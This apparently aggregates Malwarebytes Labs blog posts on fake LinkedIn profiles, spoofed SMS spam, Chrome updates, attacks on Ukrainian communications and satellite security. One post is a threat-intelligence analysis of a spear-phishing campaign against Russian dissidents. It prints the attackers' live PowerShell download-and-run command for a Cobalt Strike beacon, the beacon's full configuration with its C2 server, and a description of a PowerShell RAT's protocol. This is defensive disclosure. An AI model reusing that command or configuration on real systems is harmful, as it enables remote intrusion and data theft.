IT News

Despite continued warnings of deepfake chaos during major events, things haven’t worked out the way some thought. Those video deepfakes are bad, and they remain bad. Quite simply, nobody is fooled – or at least, nobody able to make a mistaken snap judgement in a way that matters.

As much as we over dramatise their use in our heads, the video aspect of deepfaking has a long way to go to pull the proverbial wool over our eyes. But it’s a little bit harder to spot an AI-generated image, as you can see on sites such as This Person Does Not Exist, and some people are using these fake images on social media.

When LinkedIn connections go wrong

Two Stanford University researchers, Renée DiResta and Josh Goldstein have found more than 1,000 fake Linked In profiles using AI-generated faces

The story begins with someone sending a message to an individual on LinkedIn. Nothing odd there, except the recipient happens to know their way around AI generated images.

The avatar attached to the profile did indeed turn out to be entirely fictitious; “Keenan Ramsey” does not exist. From there, the pretend people were unearthed doing their thing on LinkedIn.

These “employees” were tagged under various businesses, except those businesses said they didn’t authorize the use of computer generated profile imagery. The researchers digging into this discovered companies selling LinkedIn marketing services. They also offered bot/avatar accounts, which is a no-no from LinkedIn’s perspective.

The long tail of deepfake marketing

It’s somewhat bizarre that people may be making money from selling web generated profile pictures to businesses that could just do it themselves given 10 seconds and a web browser. It’s also bizarre that nobody at any point in this daisy-chain of fake people’s profiles seems to know exactly where, or how, or why any of this has been happening. Who is responsible? What are these accounts doing besides perhaps bolstering employee count numbers?

A very good question.

For now, it may be worth paying close attention to random messages and/or connection requests on LinkedIn. Is the person at the other end who they claim to be, or a business-realm fakeout? It may be tricky to pin down a conclusive answer, but I’d definitely rather know just who is wanting to get inside my connections network…and why.

The post Watch out for LinkedIn fakes who want to get connected appeared first on Malwarebytes Labs.

If you’ve received a spam SMS message sent from your own phone number, don’t panic.

No, you weren’t hacked. And you’re not the only one who has received such a message, which looks a bit like this:

Free Msg: Your bill is paid for March. Thanks, here’s a little gift for you: {redacted link}

But why do they make it look like the text has come from your own number? It’s likely the scammers spoofed it in order to get past built-in filter features because they don’t block messages you send yourself.

The Verge writer Chris Welch said that clicking the link directed him to Channel One Russia, a Russian state media network. But this could have easily led to nefarious payloads, like malware, and some have already classed this as a smishing (or “SMS phishing”) attempt.

Interestingly, Welch said, the texts appear to be targeting users of Verizon Wireless, one of the biggest telecommunication companies in the US. 9to5Mac’s Allison McDaniel says she’s also seen customers of Visible, Verizon’s MVNO (mobile virtual network operator), complain about the spam SMS on Reddit, too.

Rich Young, Verizon’s spokesperson, said in an email to The Verge:

“Verizon is aware that bad actors are sending spam text messages to some customers which appear to come from the customers’ own number. Our team is actively working to block these messages, and we have engaged with US law enforcement to identify and stop the source of this fraudulent activity. Verizon continues to work on behalf of the customer to prevent spam texts and related activity.”

McDaniel has advised Verizon and Visible users to report receiving this spam SMS—and others like it—to the FCC by filing a complaint. Pay particular attention to the bit on “Your Number is Being Spoofed.” You can also forward the message to SPAM (7726).

Tell your friends and family about this smishing attack. If they received one, tell them to report it, delete it and move on.

The post “A little gift for you” SMS spam appears to come from your own phone number appeared first on Malwarebytes Labs.

Google has launched Chrome version 100 which, among other things, fixes 28 vulnerabilities. Other new security features include Safety Check, Enhanced Safe Browsing, and the ability to control website access to your location and device.

Of the 28 vulnerabilities, none have been marked as critical but 9 have been marked as high severity. High severity usually means that any compromise would be limited to the browser, although vulnerabilities that allow an escape from the browser’s sandbox will often be classified as High as well. But these vulnerabilities could have more serious consequences when used in conjunction with others, so it warrants a quick update.

Version 100

We have talked about possible user-agent string problems with the introduction of version 100, for both Chrome and Firefox. With Google Chrome 100, the browser’s user-agent string now uses a three-digit version number compared to a two-digit number. After testing showed that some sites had issues with the new user-agent string, they were quickly fixed by developers so these sites now support the three-digit version. This is not to say that every site has been tested, so it may still cause problems for some.

Google has announced that Chrome 100 will be the last version of the browser with an unlimited user-agent string. The user-agent string—which is sent out on each http-request—contains information about the user’s OS, the used browser and  its version number, the device model, the architecture, and more. With this combination of parameters and the large variety of potential values, it could be possible to identify internet users based on their user-agent strings.

To reduce this option for fingerprinting Google plans to reduce the information in the user-agent string to only the browser’s brand and significant version, its desktop or mobile distinction, and the platform it’s running on.

Safety check

The new safety check allows users to quickly check a few security settings like available updates, the strength of their saved passwords, whether safe browsing is enabled, and more.

Go to your Settings and then select Security and Privacy. Here you can click the Check now button under Safety check.

Enhanced Safe Browsing

According to Google, Enhanced Safe Browsing protection adds a few extra layers to the standard protection:

• Predicts and warns you about dangerous events before they happen
• Keeps you safe on Chrome and may be used to improve your security in other Google apps when you are signed in
• Improves security for you and everyone on the web
• Warns you if passwords are exposed in a data breach
• Sends URLs to Safe Browsing to check them. Also sends a small sample of pages, downloads, extension activity, and system information to help discover new threats. Temporarily links this data to your Google Account when you’re signed in, to protect you across Google apps.

It is up to you whether you would like to provide Google with this data, but you can enable Enhanced Safe Browsing by following the procedure outlined below.

Go to Settings and then select Security and Privacy. Click Security and turn the radio button before Enhanced protection.

Control website access to your location and device

Sometimes websites ask permission to use your location, microphone, and more. Chrome now has site safety controls that help you understand and change the permissions for the sites you visit.

You can check the current permission by clicking the lock symbol in the address bar and select the Site settings to see an overview of all the permission. You will also be able to see existing permissions that you can simply reset by using the Reset permission button.

New developer APIs

With this release, Google has also added the Digital Goods API so that web applications can make in-app purchases using the Google Play Store. This API has been made available alongside the Multi-Screen Window Placement API that  extends the web platform’s single-screen paradigm to support multi-screen devices. As multi-screen devices and applications become a more common part of user experiences, it is deemed important to give web developers information and tools to leverage that expanded visual environment.

How to update Chrome

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it.

Then all you have to do is relaunch the browser in order for the update to complete.

After the update, the version should be 100.4896.60.

Stay safe, everyone!

The post Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities appeared first on Malwarebytes Labs.

People up to no good get themselves caught in an endless number of ways. This has always been the case in the real world, and continues to be true online. No matter how talented, how daring the schemes, greed and the desire for fame often win out. This has disastrous consequences for those caught, and a little more illumination for those of us taking part or watching from the sidelines.

Anybody can be caught in the act. Even groups with near mythical levels of skillset-cred fall by the wayside. It is, in the worlds of one Agent Smith, inevitable.

Well, occasionally inevitable.

The ever-shifting sands of “I’ve made a terrible mistake”

A recent article over on ITPro highlights some of the ways would-be cybercriminals and those at the more professional end of data snatching get themselves caught. So-called script kiddies can take a couple of weeks; big name groups can take longer, but they can still fall foul of the smallest mistake.

Some of the most common mistakes listed in the article are combinations of technical misfire, greed, lack of skill, and unfamiliarity with social engineering. How can things go wrong for the unwary? Let’s take a look.

Technological mishaps

Something we see happening is tiny slices of technology causing major ripples in unexpected ways. A person may have a great plan, a plan B, and a bunch of other what-ifs and workarounds. It all comes undone in the most unexpected of ways. If the founder of the infamous Silk Road can run into problems with VPNs, so can anyone.

Even if the VPN doesn’t glitch out at the worst possible moment exposing an IP address, forgetting to switch it on in the first place can give the same end result. Many years ago, a fairly prolific defacer of websites I was tracking fell foul of this problem. They became addicted to the rush of posting their latest compromises to a hacking forum dishing out kudos points for cool hacks.

Their lack of skill beyond the basics coupled with the fame rush resulted in a forum hack from their college network, with the VPN switched off. I’m still unsure if the hack they used was misused somehow and resulted in their IP posted to the defaced page, or this was revenge from the admins. Either way, enough pieces of the puzzle were available that this individual ran into trouble shortly after and ended their defacement activities. 

Oh no, my trophy storage

People involved in compromise, defacement, and other actions simply cannot help themselves with a bit of showing off. It stands to reason that those with this inclination end up assembling a large trophy case marked as “all the evidence goes here”. This trophy storage may take the form of a list of site defacements posted to a forum. It may be on passwordless server storage running off their home network. It might even just be a collection of zipfiles in cloud storage somewhere.

Other times, it may be files grabbed by malware and uploaded to a server with no encryption or passwords applied. It’s left to sit around for the longest time. Once law enforcement comes knocking, it’s likely too late for the accused to do anything about it.

When makeovers go horribly wrong

Back in the Myspace days, we’d sometimes see someone take their first steps into the defacement scene with a revamp of their personal profile. Where once it contained their name, location, and home photographs, it now looked very much like someone had just watched Hackers and decided to HACK THE PLANET.

Unfortunately for them, they didn’t know about the existence of search engine caches, or services like Internet Archive. They also failed to consider the dozens of messages in the comments section calling them by name. This is partially one reason why smarter people in the Myspace hacking scene would place their top friends outside of the top friends box, and place random people there instead.

Even without technical mishaps or overflowing trophy cabinets, there are other ways to fall on your own sword composed of ones and zeroes. The social aspect of underground forums often leads to people letting their guard down. A bit too much information shared, a little too friendly in the direct messages, and it all adds up.

Revealing too much information about yourself on forums and in chat, posting in bragging threads where you display your best hacks, can lead to disaster. Other people caught by law enforcement can turn informer, and socially engineer details from individuals who feel they’re in a safe, relaxed environment.

Turning the tables

The forums themselves can suddenly switch from safe-haven to massive bearpit of law enforcement pandemonium. Some underground forums have a very strict no-spam policy. They strengthen this stance in what may sound like very surprising ways. Some refuse to allow users to login via proxies or VPNs. That’s right: they need to use their actual IP address. How do you think this pans out if the forum is taken over by the authorities? Or simply compromised by somebody for giggles with the forum logs dumped into the wild?

The other suspicion is that any supposed underground forum demanding real world information could well be a sting operation. How does someone ever really know before they sign up?

It’s a dog eat dog world out there

If someone avoids spilling too many beans or posting incriminating information, it can still go wrong. As we’ve seen recently, little fish are tasty treats for more experienced hands. People regularly post hacking tools and phish kits to dedicated forum sections. Every so often, we see someone drop a booby-trap onto a site and gobble up all the data from compromised forum-goers.

This isn’t new, and neither are any of the other pitfalls and mishaps listed above. Even so, overenthusiastic forum-goers will keep walking into them and providing headlines for years to come. Is it really worth the worry?

The post Looking over your shoulder: when small mistakes have big consequences appeared first on Malwarebytes Labs.

Since the start of the Russian invasion of Ukraine, the war on the battlefield has been accompanied by cyber attacks. Those attacks against critical infrastructure have knocked out banking and defense platforms, mostly by targeting several communication systems.

In a timeline set up by NetBlocks, you can follow individual attacks on communication services, starting Thursday 24 February 2022, the same day the invasion of Ukraine started. The attack methods are very diverse, as are the consequences.

But that wasn’t the start of it, the denial of service attacks that were clear attempts to disrupt banking and defense services began earlier, and a huge drop of connectivity was noticed as early as February 15, 2022.

NetBlocks

NetBlocks is a global Internet monitor based in London. It uses “diffscans”, which map the IP address space of a country in real time, and show Internet connectivity levels and corresponding outages. Deliberate Internet outages will often show a distinct network pattern, and NetBlocks uses those patterns to determine and attribute the root cause of an outage.

The NetBlocks timeline shows disruptions of fixed-line service provider Triolan, the Viasat satellite internet network, backbone internet provider GigaTrans, network operator Kyivstar, the Vinasterisk network, as well as targeted attacks on certain areas that were often accompanied or followed by physical strikes.

Financial problems have also presented challenges for network operators. On Tuesday 15 March, internet provider LocalNet announced that it would have to lock down subscribers with debt on their account due to difficulty paying the company’s own bills.

On Monday 28 March 2022, Ukraine’s national provider Ukrtelecom experienced an extended, nation-scale network disruption, following a major cyberattack. It’s not yet known whether Ukrtelecom—a telephone, internet and mobile provider—was hit by a distributed denial of service (DDoS) attack or a deeper, more sophisticated intrusion. But NetBlocks stated that the gradual loss of connectivity was a giveaway that it wasn’t a power or cable cut.

Communications

As we have said in the past, communication systems are a vital infrastructure. Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. This is also why we see a lot of misinformation and disinformation on both sides of the conflict.

The ongoing conflict has also affected radiation monitoring, communications, and long-term maintenance and cleanup efforts at nuclear power plants across Ukraine, which is an extra worrying factor. The loss of communications was subsequently raised as a point of concern by the International Atomic Energy Agency.

Methods of disruption

When it comes to disrupting communications services the methods are as diverse as the means of communication. Communication lines and infrastructure include physical lines, satellites, and other wireless methods.

Physical lines can be cut off in physical attacks, but they are also vulnerable to the cyberattacks that can be used against wireless communications.

• An unwanted wireless signal injected into the original signal may result in a temporary loss of wireless signals, poor receiver performance, or bad quality of output by the electronic equipment.
• Channel interferences influencing the performance of wireless communication systems can be co-channel interferences or adjacent channel interferences.
• Overload attacks, like DDoS attacks are designed to overwhelm the available capacity of the infrastructure or absorb so much capacity that the negative influence on the service is notable.
• Attacks on physical components like cables, switches, routers, and network centers.

As we discussed recently, even our networks of satellites and space systems are vulnerable to cyberattacks, which can create a backdoor into the physical and digital systems we rely upon on a daily basis.

DDoS

A tried and tested method to disrupt communications is to overload the network(s) with a Distributed Denial of Service (DDoS) attack. This type of attack involves sending large amounts of traffic from multiple sources to a service or website, intending to overwhelm it.

One DDoS method that was used against Ukrainian websites was via hundreds of compromised WordPress sites that use visitors’ browsers to perform DDoS attacks by means of an inserted malicious script. The DDoS attacks will occur in the background without the user knowing it’s happening, other than a slowdown of their browser. BleepingComputer discovered that the same script is being used by a pro-Ukrainian site to conduct attacks on Russian websites.

Incommunicado

The cyberattacks on communications are an understandable part of modern warfare. And one that nations and international organizations should prepare for. But, as always, these attacks have consequences for the inhabitants of the countries that are at war.

On both sides of the conflict, people have been cut off from communications. On the Russian side people have been denied access to most social media, which they have been trying to circumvent by using VPNs. But what is way worse from a human perspective is that worried Ukrainians are unable to reach their relatives in areas that are under attack.

The post Attacks on Ukraine communications are a major part of the war appeared first on Malwarebytes Labs.

This blog post was authored by Hossein Jazi.

— Updated to clarify the two different campaigns (Cobalt Strike and Rat)

Several threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is activity monitoring these threats and has observed activities associated with the geopolitical conflict.

More specifically, we’ve witnessed several APT actors such as Mustang Panda, UNC1151 and SCARAB that have used war-related themes to target mostly Ukraine. We’ve also observed several different wipers and cybercrime groups such as FormBook using the same tactics. Beside those known groups we saw an actor that used multiple methods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables.

On March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.

The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.

Spear phishing as the main initial infection vector

These emails pretend to be from the “Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation” and “Federal Service for Supervision of Communications, Information Technology and Mass Communications” of Russia.

We have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor leveraged a new variant of this exploit called CABLESS in this attack. Sophos has reported an attack that used a Cabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to prepend the WSF data to it.

• Email with RTF file:
  • Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Federal Service for Supervision of Communications, Information Technology and Mass Communications)
  • Предупреждение! Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)

• Email with archive file:
  • информирование населения об критических изменениях в сфере цифровых технологий, сервисов, санкций и уголовной ответственности за их использование. (informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)
  • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

• Email with link:
  • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

Victimology

The actor has sent its spear phishing emails to people that had email with these domains:

mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net

Based on these domains, here is the list of potential victims:

• Portal of authorities of the Chuvash Republic Official Internet portal
• Russian Ministry of Internal Affairs
• ministry of education and science of the republic of Altai
• Ministry of Education of the Stavropol Territory
• Minister of Education and Science of the Republic of North Ossetia-Alania
• Government of Astrakhan region
• Ministry of Education of the Irkutsk region
• Portal of the state and municipal service Moscow region
• Ministry of science and higher education of the Russian Federation

Analysis:

The lures used by the threat actor are in Russian language and pretend to be from Russia’s “Ministry of Information Technologies and Communications of the Russian Federation” and “MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS”. One of them is a letter about limitation of access to Telegram application in Russia.

These RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the MSHTML engine.
http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html

The html file contains a script that executes the script in WSF data embedded in the RTF file.

The actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8, WSF data contains a JScript code that can be accessed from a remote location. In this case this data has been accessed using the downloaded html exploit file.

Executing this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim’s machine. (The deployed CobaltStrike file name is Putty)

"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMPputty.exe; . $env:TEMPputty.exe; Start-Sleep 15

The following shows the CobaltStrike config:

{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 38500,
  "MaxGetSize": 1398151,
  "Jitter": 27,
  "C2Server": "wikipedia-book.vote,/async/newtab_ogb",
  "HttpPostUri": "/gen_204",
  "Malleable_C2_Instructions": [
    "Remove 17 bytes from the end",
    "Remove 32 bytes from the beginning",
    "Base64 URL-safe decode"
  ],
  "SpawnTo": "/4jEZLD/DHKDj1CbBvlJIg==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 96,
  "Spawnto_x86": "%windir%\syswow64\gpupdate.exe",
  "Spawnto_x64": "%windir%\sysnative\gpupdate.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1432529977,
  "bStageCleanup": "True",
  "bCFGCaution": "True",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16700,
  "ProcInject_PrependAppend_x86": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_PrependAppend_x64": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_Execute": [
    "ntdll.dll:RtlUserThreadStart",
    "SetThreadContext",
    "NtQueueApcThread-s",
    "kernel32.dll:LoadLibraryA",
    "RtlCreateUserThread"
  ],
  "ProcInject_AllocationMethod": "NtMapViewOfSection",
  "bUsesCookies": "True",
  "HostHeader": ""
}

Similar lure used by another actor

We also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to Carbon Spider and uses “Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций” (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat.

The dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation.

After deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:

• JavaScript
• PowerShell
• Executable
• DLL

All of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with “Madagascar” which probably is the alias of the threat actor.

After setting up the configuration, it calls the “Initialize-Engine” function. This function collects the victim’s info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by “|” character and at the end it add the group name and API config value. The created string is being send to the server using Send-WebInit function. This function adds “INIT%%%” string to the created string and base64 encodes it and sends it to the server.

After performing the initialization, it goes into a loop that keeps calling the “Invoke-Engine” function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends “GETTASK%%” in Base64 format to its server to show it is ready to get tasks and execute them. The “IC” command is used to delete itself.

The result of the task execution will be send to the server using “PUTTASK%%” command.

Infrastructure

The following shows the infrastructure used by this actor highlighting that the different lures are all connected.

The Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.

IOCs

RTF files host domain:
digital-ministry[.]ru
RTF files:
PKH telegram.rtf
b19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e
PKH.rtf
38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20
MSHTML exploit:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html
4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c
CobaltStrike Download URL:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe
CobaltStrike:
Putty.exe
d4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d
CobaltStrike C2:
wikipedia-book[.]vote/async/newtab_ogb
Macro based maldoc:
c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28
PowerShell based RAT:
9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0
PowerShell Rat C2:
swordoke[.]com

The post New spear phishing campaign targets Russian dissidents appeared first on Malwarebytes Labs.

In the context of this article we will use the term satellite for a machine that is launched into space and moves around Earth. And there might be a lot more of them than you would expect—this live map tracks a huge number of satellites.

Originally most of earth’s satellites were launched for scientific reasons. Some because of their unique ability to provide a view of a large area of the earth’s surface, and others because they are able to study space without having to deal with the atmosphere.

Today, a majority of the satellites in orbit are used in some form of communication. That’s not surprising when you consider that Elon Musk’s SpaceX is by far the largest operator of satellites. In September 2021, the total number of satellites amounted to 4550, with 1655 of them belonging to SpaceX. SpaceX’s Starlink satellite Internet program plans to send more than a thousand new satellites into orbit every year.

Commercial satellites, like Starlink, provide us with the ability to have things like Internet access, television, GPS, and scientific information about the weather and other processes in the atmosphere and on the surface.

CISA

On March 17, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published an alert in conjunction with the Federal Bureau of Investigation (FBI) which warned of possible threats to US and international satellite communication (SATCOM) networks.

Along with that alert came a report that provided mitigation strategies for SATCOM providers and their customers. And, as part of CISA’s Shields Up initiative, all organizations are being asked to significantly lower their threshold for reporting and sharing indications of malicious cyberactivity.

Russia

On March 2, 2022 the current head of the Russian Roscosmos State Space Corporation, Dmitry Rogozin, said that Russia will consider any cyberattacks targeting Russian satellite infrastructure an act of war. This didn’t seem to stop activist group NB65 from claiming that it had disabled WS02, the Rocosmos Vehicle Monitoring System.

Viasat

On February 28, 2022 US-listed satellite communications firm Viasat Inc said it was investigating a suspected cyberattack that caused a partial outage in its residential broadband services in Ukraine and other European countries. Among other things, the outage caused a disruption of the remote monitoring and control of 5,800 wind turbines in Central Europe, with a total capacity of 11 gigawatt (GW).

Starlink

Viasat operates large geostationary satellites. Geostationary means they are synchronized with the earth’s rotation, which results in a stationary orbit at a point about 35,000 kilometers from Earth.

Viasat’s geostationary approach is the traditional method of providing broadband service from space, but other operators, like Starlink, use satellites in low earth orbits. This requires more satellites, but provides higher speeds.

In answer to a request for Starlink support from Ukraine digital minister Mykhailo Fedorov, SpaceX’s CEO Elon Musk was quick to respond and promise help.

Critical infrastructure

The examples above demonstrate how networks of satellites and space systems are vulnerable to cyberattack, and create a backdoor into the physical and digital systems we rely upon on a daily basis.

While we tend to think about other things first when we are discussing critical infrastructure, the underlying systems that enable technology functionality across these sectors often rely on space systems. For example, some high-tech farming equipment relies on GPS information provided by satellite.

Like so many other important assets, a lot of space systems were developed without cybersecurity in mind. Around the turn of the century, cybersecurity was not a big concern, and during the development of some systems no special cybersecurity parameters were deployed because engineers thought the technology was too advanced for a hacker to compromise.

It wasn’t until NASA set up the Cyber Defense Engineering and Research Group (CDER) that anyone looked at the unique cybersecurity requirements that distinguishes space mission systems from traditional firewalled data servers.

And it wasn’t until the end of 2016, that AT&T encrypted NASA’s Deep Space Network (DSN), after a report on how to hack into the Mars Rover appeared on the Internet.

Recommendations

If you know or suspect that an important part of your organization’s internal processes depends on satellite services, the CISA report provides some guidelines for customers of SATCOM providers:

• Use secure methods for authentication.
• Enforce principle of least privilege through authorization policies.
• Review existing trust relationships with IT service providers.
• Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider.
• Strengthen the security of operating systems, software, and firmware, including vulnerability and patch management.
• Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
• Create, maintain, and exercise a cyberincident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.

Stay safe, everyone!

The post Satellites are critical infrastructure and need to be cybersecured appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• Anti-war open-source software developer targets Russians and Belarussians with “protestware”
• Elden Ring exploit traps players in infinite death loop
• Update now! Many HP printers affected by three critical security vulnerabilities
• White House urges US businesses: Protect against potential Russian cyberattacks
• Okta admits 366 customers may have been impacted by LAPSUS$ breach
• A new rootkit comes to an ATM near you
• Facebook users wary of security mail find themselves locked out of accounts
• Fake Esports voting sites looking to phish Steam users
• AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI
• Facebook phish claims “Someone tried to log into your account”

Stay safe!

The post A week in security (March 21 – 27) appeared first on Malwarebytes Labs.

The FBI’s Internet Crime Complaint Center (IC3) has released its annual report. In 2021, IC3 continued to receive a record number of complaints from the American public: 847,376 reported complaints, which was a 7% increase from 2020, with potential losses exceeding $6.9 billion. Among the complaints received, ransomware, business email compromise (BEC) schemes, and the criminal use of cryptocurrency are among the top incidents reported.

The IC3 also received 23,903 complaints related to tech support fraud from victims in 70 countries. The losses amounted to more than $347 million, which represents a 137 percent increase in losses from 2020.

Tech support fraud

Tech support fraud is a type of scam that is often neglected in the press, but as a security software vendor we often get reminded that this branch of scamming is still active. The only surprise in the report is that it is still a sector that is showing a strong growth.

Tech support fraud is where a criminal poses as customer, security, or technical support in order to defraud unwitting individuals. Criminals involved in tech support fraud will claim to be support or service employees from trusted institutions like banks and software vendors. Often, they sell victims services they don’t need or at absurd prices, and many victims report being directed to make wire transfers to overseas accounts or purchase large amounts of prepaid cards.

Malwarebytes examples

We get a lot of questions and complaints about tech support scammers impersonating us or using our brand to defraud victims. We set up a dedicated page for tech support scams years ago. Sometimes the scam mails are easy to recognize, and the offers these scammers make are often heavily over-priced. In the example shown below, the scammer couldn’t decide whether to use MW Bytes or MA Bytes, but they added our logo at the bottom to make a good impression.

This is an email template we see quite often. Although the phone number may be different at times.

To help you avoid Malwarebytes impersonators, there are a few important red flags you can look out for:

• Overpricing. You can find our actual pricing here: https://www.malwarebytes.com/pricing
• Malwarebytes does not use a third party company for technical support on our products. Support is in-house at Malwarebytes.
• Our employees have company email addresses, so we will not use gmail, comcast, or other third party email addresses in our customer facing communications.

Senders that claim to be responsible for Malwarebytes Tech Support which we see repeatedly are TechGeek, Geek Squad Team, Czone Solutions Inc, Tech philosopher, Web-Gear solutions, and Malwarebytes Support R Us. While some of these may be the names of actual legitimate companies, none of them have any business acting on Malwarebytes’ behalf.

How to avoid tech support scams

In general, keep an eye out for overpricing. And do your own research to check the company in question’s charges.

When in doubt, do not use links or phone numbers sent by email. Research a direct method of contacting the organization by yourself and use that line of contact to enquire whether they are the origin of the mail.

For matters regarding Malwarebytes, please reach out to our Support team.

Stay safe, everyone!

The post Tech support fraud is still very much alive, says latest FBI report appeared first on Malwarebytes Labs.

Google has urged its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. This is in response to a bug reported by an anonymous security researcher last week.

The flaw, which is tracked as CVE-2022-1096, is a a “Type Confusion in V8” and is rated as high severity, meaning that it’s necessary for everyone using Chrome to update as quickly as possible because of the damage attackers could cause once they exploit this.

Not much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn’t be ignored.

Google is always cautious to release more details until the majority of users are updated with a fix. Google says it may take weeks before the update reaches its entire user base.

How to update

The easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time.

My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is relaunch the browser.

Microsoft Edge

Microsoft has confirmed that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.

The post Update now! Google releases emergency patch for Chrome zero-day used in the wild appeared first on Malwarebytes Labs.